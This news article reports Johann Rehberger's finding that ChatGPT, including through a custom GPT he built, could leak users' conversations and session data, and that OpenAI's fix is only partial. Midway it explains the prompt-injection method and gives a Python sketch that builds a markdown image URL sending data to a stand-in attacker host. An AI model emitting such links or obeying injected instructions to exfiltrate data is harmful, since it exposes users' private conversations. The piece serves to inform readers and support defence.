We've said it before, and we'll say it again: Don't input anything into ChatGPT that you don't want unauthorized parties to read.
Since OpenAI released ChatGPT last year, there have been quite a few occasions where flaws in the AI chatbot could've been weaponized or manipulated by bad actors to access sensitive or private data. And this latest example shows that even after a security patch has been released, problems can still persist.
According to a report by Bleeping Computer, OpenAI has recently rolled out a fix for an issue where ChatGPT could leak users' data to unauthorized third parties. This data could include user conversations with ChatGPT and corresponding metadata like a user's ID and session information.
However, according to security researcher Johann Rehberger, who originally discovered the vulnerability and outlined how it worked, there are still gaping security holes in OpenAI's fix. In essence, the security flaw still exists.
Rehberger was able to take advantage of OpenAI's recently released and much-lauded custom GPTs feature to create his own GPT, which exfiltrated data from ChatGPT. This is a significant finding, as custom GPTs are being marketed as AI apps in the way the App Store revolutionized mobile applications for the iPhone. If Rehberger could create this custom GPT, it seems likely that bad actors could soon discover the flaw and create custom GPTs to steal data from their targets.
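The article doesn't spell out the mechanism, but Rehberger's published research describes a common class of chatbot exfiltration: injected instructions make the model emit a markdown image whose URL smuggles conversation data to an attacker's server in the query string. The sketch below is a hypothetical illustration of that general technique, not OpenAI's or Rehberger's actual code; the domain and function names are invented for the example.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled server (invented for illustration).
ATTACKER_HOST = "https://attacker.example"

def exfil_markdown(secret: str) -> str:
    """Build a markdown image tag whose URL leaks `secret`.

    If a chat client automatically renders images in model output,
    fetching this "image" sends the URL-encoded secret to the
    attacker's server, where it appears in the access logs.
    """
    return f"![loading]({ATTACKER_HOST}/pixel.png?d={quote(secret)})"

print(exfil_markdown("user session: abc123"))
```

This is why OpenAI's mitigation centered on validating image URLs before rendering them, and why Rehberger notes data can still "leak" in small amounts: any channel that lets model output trigger a request to an arbitrary URL can carry a payload.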
Rehberger says he first contacted OpenAI about the "data exfiltration technique" back in April. He contacted OpenAI again in November to report exactly how he was able to create a custom GPT and carry out the process.
On Wednesday, Rehberger posted an update to his website: OpenAI had patched the leak vulnerability.
"The fix is not perfect, but a step into the right direction," Rehberger explained.
The reason the fix isn't perfect is that ChatGPT can still be tricked into sending data through the vulnerability Rehberger discovered.
"Some quick tests show that bits of info can steal [sic] leak," Rehberger wrote, further explaining that "it only leaks small amounts this way, is slow and more noticeable to a user." Regardless of the remaining issues, Rehberger said it's a "step in the right direction for sure."
And the security flaw remains entirely unpatched in the ChatGPT apps for iOS and Android, which have yet to receive the fix.
ChatGPT users should remain vigilant when using custom GPTs and should likely pass on these AI apps from unknown third parties.